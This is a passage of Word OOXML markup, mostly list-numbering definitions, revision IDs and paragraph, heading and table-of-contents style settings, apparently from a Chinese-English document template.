      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-GB"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-3"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="8lab-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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="67FB4F8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67FB4F8B"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68BA003C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68BA003C"/>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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6A994295"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A994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6CEE3A37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CEE3A37"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="74F06206"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F06206"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-8-"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Fig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7DB13D5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DB13D5E"/>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44"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="36">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proofState w:grammar="clean"/>
  <w:stylePaneSortMethod w:val="0002"/>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59A"/>
    <w:rsid w:val="00003A9D"/>
    <w:rsid w:val="00016976"/>
    <w:rsid w:val="00031D9E"/>
    <w:rsid w:val="00040216"/>
    <w:rsid w:val="00040523"/>
    <w:rsid w:val="00041F2A"/>
    <w:rsid w:val="00051846"/>
    <w:rsid w:val="00063D9B"/>
    <w:rsid w:val="00072E09"/>
    <w:rsid w:val="00073F8D"/>
    <w:rsid w:val="000812A7"/>
    <w:rsid w:val="00084C3A"/>
    <w:rsid w:val="0009388D"/>
    <w:rsid w:val="000A04E4"/>
    <w:rsid w:val="000B5C8E"/>
    <w:rsid w:val="000C41FD"/>
    <w:rsid w:val="000E4336"/>
    <w:rsid w:val="000E536A"/>
    <w:rsid w:val="000E682D"/>
    <w:rsid w:val="000F4C16"/>
    <w:rsid w:val="000F6021"/>
    <w:rsid w:val="000F77D2"/>
    <w:rsid w:val="001020CF"/>
    <w:rsid w:val="0010334F"/>
    <w:rsid w:val="001054AA"/>
    <w:rsid w:val="001106A5"/>
    <w:rsid w:val="0011795E"/>
    <w:rsid w:val="00126143"/>
    <w:rsid w:val="0012768B"/>
    <w:rsid w:val="00132147"/>
    <w:rsid w:val="00142CD1"/>
    <w:rsid w:val="00144FAA"/>
    <w:rsid w:val="00153CC9"/>
    <w:rsid w:val="001636DA"/>
    <w:rsid w:val="001665BF"/>
    <w:rsid w:val="001706AC"/>
    <w:rsid w:val="00182551"/>
    <w:rsid w:val="0018710C"/>
    <w:rsid w:val="00193C28"/>
    <w:rsid w:val="001966BB"/>
    <w:rsid w:val="001A7D38"/>
    <w:rsid w:val="001B221C"/>
    <w:rsid w:val="001B7460"/>
    <w:rsid w:val="001B7841"/>
    <w:rsid w:val="001E5669"/>
    <w:rsid w:val="001F0910"/>
    <w:rsid w:val="001F782D"/>
    <w:rsid w:val="002271CE"/>
    <w:rsid w:val="002272C6"/>
    <w:rsid w:val="00232D1A"/>
    <w:rsid w:val="00234241"/>
    <w:rsid w:val="0025259A"/>
    <w:rsid w:val="0026502B"/>
    <w:rsid w:val="00271A69"/>
    <w:rsid w:val="00287768"/>
    <w:rsid w:val="002917CD"/>
    <w:rsid w:val="00293452"/>
    <w:rsid w:val="00295309"/>
    <w:rsid w:val="00295BE6"/>
    <w:rsid w:val="00296D58"/>
    <w:rsid w:val="002A0233"/>
    <w:rsid w:val="002A4393"/>
    <w:rsid w:val="002B727C"/>
    <w:rsid w:val="002C4F82"/>
    <w:rsid w:val="002E5AC5"/>
    <w:rsid w:val="002F26E3"/>
    <w:rsid w:val="002F74AE"/>
    <w:rsid w:val="00304677"/>
    <w:rsid w:val="00316959"/>
    <w:rsid w:val="00342DFA"/>
    <w:rsid w:val="00342E71"/>
    <w:rsid w:val="00356970"/>
    <w:rsid w:val="00366666"/>
    <w:rsid w:val="0037026F"/>
    <w:rsid w:val="003826BC"/>
    <w:rsid w:val="003A2163"/>
    <w:rsid w:val="003A5FD6"/>
    <w:rsid w:val="003B0746"/>
    <w:rsid w:val="003C3F40"/>
    <w:rsid w:val="003D72D7"/>
    <w:rsid w:val="00402093"/>
    <w:rsid w:val="00402C2E"/>
    <w:rsid w:val="00403B6D"/>
    <w:rsid w:val="00406F7D"/>
    <w:rsid w:val="00407BFF"/>
    <w:rsid w:val="00432778"/>
    <w:rsid w:val="004335AD"/>
    <w:rsid w:val="00434778"/>
    <w:rsid w:val="00457B5F"/>
    <w:rsid w:val="0046097B"/>
    <w:rsid w:val="004615D9"/>
    <w:rsid w:val="0047730B"/>
    <w:rsid w:val="00491BB5"/>
    <w:rsid w:val="00497F5F"/>
    <w:rsid w:val="004B2B84"/>
    <w:rsid w:val="004B2B8B"/>
    <w:rsid w:val="004C737A"/>
    <w:rsid w:val="004D362F"/>
    <w:rsid w:val="004E2ED5"/>
    <w:rsid w:val="004E57C9"/>
    <w:rsid w:val="00501406"/>
    <w:rsid w:val="00501AE9"/>
    <w:rsid w:val="00504932"/>
    <w:rsid w:val="00543E4A"/>
    <w:rsid w:val="00547F8D"/>
    <w:rsid w:val="00551FA4"/>
    <w:rsid w:val="0055239D"/>
    <w:rsid w:val="00554415"/>
    <w:rsid w:val="00556822"/>
    <w:rsid w:val="0056057A"/>
    <w:rsid w:val="00570215"/>
    <w:rsid w:val="00572CC1"/>
    <w:rsid w:val="00583D84"/>
    <w:rsid w:val="00585EE6"/>
    <w:rsid w:val="005903CF"/>
    <w:rsid w:val="0059179A"/>
    <w:rsid w:val="005A5902"/>
    <w:rsid w:val="005C2AA7"/>
    <w:rsid w:val="005C2FBD"/>
    <w:rsid w:val="005C4BD7"/>
    <w:rsid w:val="005D20C6"/>
    <w:rsid w:val="005D7750"/>
    <w:rsid w:val="005E20A0"/>
    <w:rsid w:val="005E3F43"/>
    <w:rsid w:val="00601106"/>
    <w:rsid w:val="00601159"/>
    <w:rsid w:val="006011F7"/>
    <w:rsid w:val="00625ADD"/>
    <w:rsid w:val="00627AA6"/>
    <w:rsid w:val="00632D01"/>
    <w:rsid w:val="00637DED"/>
    <w:rsid w:val="00665EFC"/>
    <w:rsid w:val="00673CCA"/>
    <w:rsid w:val="00683512"/>
    <w:rsid w:val="00685469"/>
    <w:rsid w:val="00687FC9"/>
    <w:rsid w:val="006931A1"/>
    <w:rsid w:val="00695D1B"/>
    <w:rsid w:val="006A46C8"/>
    <w:rsid w:val="006A621F"/>
    <w:rsid w:val="006A7CAB"/>
    <w:rsid w:val="006B397D"/>
    <w:rsid w:val="006C3FBD"/>
    <w:rsid w:val="006C6AD4"/>
    <w:rsid w:val="006D1FE0"/>
    <w:rsid w:val="006D7B59"/>
    <w:rsid w:val="006E2E08"/>
    <w:rsid w:val="006E723F"/>
    <w:rsid w:val="006E7844"/>
    <w:rsid w:val="006F3F3E"/>
    <w:rsid w:val="00706792"/>
    <w:rsid w:val="00720B63"/>
    <w:rsid w:val="0072407C"/>
    <w:rsid w:val="00751612"/>
    <w:rsid w:val="00752A7D"/>
    <w:rsid w:val="007658FF"/>
    <w:rsid w:val="00766FD0"/>
    <w:rsid w:val="0077034A"/>
    <w:rsid w:val="0077115E"/>
    <w:rsid w:val="0077149A"/>
    <w:rsid w:val="007A6E9A"/>
    <w:rsid w:val="007B11F5"/>
    <w:rsid w:val="008040BD"/>
    <w:rsid w:val="00812BB1"/>
    <w:rsid w:val="00823B98"/>
    <w:rsid w:val="008252F3"/>
    <w:rsid w:val="00833C0D"/>
    <w:rsid w:val="00845D1D"/>
    <w:rsid w:val="00845D95"/>
    <w:rsid w:val="00857B72"/>
    <w:rsid w:val="00864BA4"/>
    <w:rsid w:val="008657B1"/>
    <w:rsid w:val="008803E2"/>
    <w:rsid w:val="0088049E"/>
    <w:rsid w:val="0088118F"/>
    <w:rsid w:val="00893EE7"/>
    <w:rsid w:val="00895A44"/>
    <w:rsid w:val="008C2EDA"/>
    <w:rsid w:val="008D5C33"/>
    <w:rsid w:val="008F13CD"/>
    <w:rsid w:val="008F1644"/>
    <w:rsid w:val="008F1CAC"/>
    <w:rsid w:val="00914C45"/>
    <w:rsid w:val="00917639"/>
    <w:rsid w:val="00942D38"/>
    <w:rsid w:val="009446E6"/>
    <w:rsid w:val="009463DF"/>
    <w:rsid w:val="00952DD1"/>
    <w:rsid w:val="00985B98"/>
    <w:rsid w:val="009B229F"/>
    <w:rsid w:val="009B4CE4"/>
    <w:rsid w:val="009B6623"/>
    <w:rsid w:val="009B7005"/>
    <w:rsid w:val="009C1377"/>
    <w:rsid w:val="009C1E94"/>
    <w:rsid w:val="009C5828"/>
    <w:rsid w:val="009E010D"/>
    <w:rsid w:val="009E30AC"/>
    <w:rsid w:val="00A02C45"/>
    <w:rsid w:val="00A1088D"/>
    <w:rsid w:val="00A16E5B"/>
    <w:rsid w:val="00A25348"/>
    <w:rsid w:val="00A317BF"/>
    <w:rsid w:val="00A34A99"/>
    <w:rsid w:val="00A434D4"/>
    <w:rsid w:val="00A50915"/>
    <w:rsid w:val="00A54115"/>
    <w:rsid w:val="00A5661A"/>
    <w:rsid w:val="00A67C10"/>
    <w:rsid w:val="00A912E4"/>
    <w:rsid w:val="00A941A1"/>
    <w:rsid w:val="00A95316"/>
    <w:rsid w:val="00AC1109"/>
    <w:rsid w:val="00AD447E"/>
    <w:rsid w:val="00AF494E"/>
    <w:rsid w:val="00AF76FC"/>
    <w:rsid w:val="00B005A8"/>
    <w:rsid w:val="00B03496"/>
    <w:rsid w:val="00B05F13"/>
    <w:rsid w:val="00B17A0A"/>
    <w:rsid w:val="00B2181D"/>
    <w:rsid w:val="00B239F7"/>
    <w:rsid w:val="00B270B5"/>
    <w:rsid w:val="00B273B5"/>
    <w:rsid w:val="00B50988"/>
    <w:rsid w:val="00B56EA7"/>
    <w:rsid w:val="00B65447"/>
    <w:rsid w:val="00BB54AD"/>
    <w:rsid w:val="00BB6E67"/>
    <w:rsid w:val="00BC04EC"/>
    <w:rsid w:val="00BC36A3"/>
    <w:rsid w:val="00C110ED"/>
    <w:rsid w:val="00C1131A"/>
    <w:rsid w:val="00C134BB"/>
    <w:rsid w:val="00C2216B"/>
    <w:rsid w:val="00C225F9"/>
    <w:rsid w:val="00C36A26"/>
    <w:rsid w:val="00C40F95"/>
    <w:rsid w:val="00C55A9C"/>
    <w:rsid w:val="00C569E5"/>
    <w:rsid w:val="00C806B7"/>
    <w:rsid w:val="00C839CB"/>
    <w:rsid w:val="00C8507E"/>
    <w:rsid w:val="00CA1E9A"/>
    <w:rsid w:val="00CC313D"/>
    <w:rsid w:val="00CC694E"/>
    <w:rsid w:val="00CC6D8A"/>
    <w:rsid w:val="00CD0BDF"/>
    <w:rsid w:val="00CD0D1B"/>
    <w:rsid w:val="00D054DE"/>
    <w:rsid w:val="00D14680"/>
    <w:rsid w:val="00D245AA"/>
    <w:rsid w:val="00D25042"/>
    <w:rsid w:val="00D34165"/>
    <w:rsid w:val="00D43A10"/>
    <w:rsid w:val="00D47F2F"/>
    <w:rsid w:val="00D71F02"/>
    <w:rsid w:val="00D722BD"/>
    <w:rsid w:val="00D73B05"/>
    <w:rsid w:val="00D90B6B"/>
    <w:rsid w:val="00D94BBC"/>
    <w:rsid w:val="00DA2394"/>
    <w:rsid w:val="00DB04AD"/>
    <w:rsid w:val="00DB6140"/>
    <w:rsid w:val="00DF19C5"/>
    <w:rsid w:val="00DF31B4"/>
    <w:rsid w:val="00E0407E"/>
    <w:rsid w:val="00E15349"/>
    <w:rsid w:val="00E17CD0"/>
    <w:rsid w:val="00E20461"/>
    <w:rsid w:val="00E25719"/>
    <w:rsid w:val="00E277D5"/>
    <w:rsid w:val="00E43C7C"/>
    <w:rsid w:val="00E47306"/>
    <w:rsid w:val="00E523C0"/>
    <w:rsid w:val="00E56687"/>
    <w:rsid w:val="00E5735C"/>
    <w:rsid w:val="00E6048B"/>
    <w:rsid w:val="00E63162"/>
    <w:rsid w:val="00E7494A"/>
    <w:rsid w:val="00E77EF6"/>
    <w:rsid w:val="00E959DC"/>
    <w:rsid w:val="00EB31F8"/>
    <w:rsid w:val="00ED1283"/>
    <w:rsid w:val="00EF34D4"/>
    <w:rsid w:val="00F04B84"/>
    <w:rsid w:val="00F23570"/>
    <w:rsid w:val="00F23DF1"/>
    <w:rsid w:val="00F301B6"/>
    <w:rsid w:val="00F3212D"/>
    <w:rsid w:val="00F35BFF"/>
    <w:rsid w:val="00F360CF"/>
    <w:rsid w:val="00F422B4"/>
    <w:rsid w:val="00F42FB8"/>
    <w:rsid w:val="00F44F83"/>
    <w:rsid w:val="00F50694"/>
    <w:rsid w:val="00F52796"/>
    <w:rsid w:val="00F566C0"/>
    <w:rsid w:val="00F5725D"/>
    <w:rsid w:val="00F71BF6"/>
    <w:rsid w:val="00F77438"/>
    <w:rsid w:val="00FA76F6"/>
    <w:rsid w:val="00FC4256"/>
    <w:rsid w:val="00FD040B"/>
    <w:rsid w:val="00FF60C5"/>
    <w:rsid w:val="00FF6E80"/>
    <w:rsid w:val="01DF6518"/>
    <w:rsid w:val="75E02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0600EAB6"/>
  <w15:docId w15:val="{E69DEE32-04EE-442E-8AC5-53559F224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iPriority="0" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="annotation text" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="header" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="footer" w:uiPriority="0"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uiPriority="0"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semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Preformatted" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="HTML Sample" w:unhideWhenUsed="1" w:qFormat="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B5F"/>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numPr>
        <w:numId w:val="4"/>
      </w:numPr>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numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="4"/>
      </w:numPr>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pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="4"/>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4"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="5Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="6Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="7Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="8Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="9Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="4"/>
      </w:numPr>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1260"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char2"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="840"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="微软雅黑" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="80">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1470"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Date"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char3"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:leftChars="2500" w:left="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char5"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char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2F26E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:beforeLines="100" w:before="100"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="微软雅黑" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="40">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="630"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char7"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="60">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1050"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="420" w:hanging="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="002F26E3"/>
    <w:pPr>
      <w:ind w:left="210"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="微软雅黑" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="90">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>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d">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char8"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
